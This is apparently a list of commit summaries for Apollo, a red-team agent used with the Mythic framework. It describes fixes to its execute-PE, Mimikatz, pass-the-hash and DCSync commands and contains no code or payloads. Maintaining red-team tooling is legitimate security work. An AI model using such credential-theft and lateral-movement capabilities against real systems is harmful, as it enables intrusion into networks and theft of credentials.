- [Change Apollo execute_pe processing](https://github.com/MEhrn00/Apollo/commit/5bedc3001304c169e9364a0b25c44131da0d731b) - This rewrites the execute pe task in Apollo to accommodate for the command line changes and the new IPC structure changes. The task was also restructured to better log any execution errors and return them back to Mythic in case there is a failure.
- [Add ExecutePE.Standalone](https://github.com/MEhrn00/Apollo/commit/e1f248e92178cd3d98ca7e9f44a610d6f730a54b) - This is a new subproject for Apollo which adds a command line program for running the execute pe task standalone. The command line program takes in an executable and command line for passing to the execute pe task.
- [Change Mimikatz command line handling](https://github.com/MEhrn00/Apollo/commit/1648f6092a7acc32b3ded19e242abf104d1f3c58) - This adds changes to the mimkatz command to handle the execute pe command line argument changes. It also fixes issues with the mimikatz command string quoting.
- [Fix pth command](https://github.com/MEhrn00/Apollo/commit/f33e3b5c36319e1275b1f76c68eb1d120ba04d5a) - This fixes issues with the pth command where it would not run properly and the modal would not accept credentials. The pth command also adjusts for the changes to the execute pe command line processing.
- [Fixes for dcsync command](https://github.com/MEhrn00/Apollo/commit/11ccc43d637549dc7ea593b6e98112cbc113475e) - Changes to the dcsync command which fix issues where it would not run properly. This does NOT fix the credential extraction function from processed output.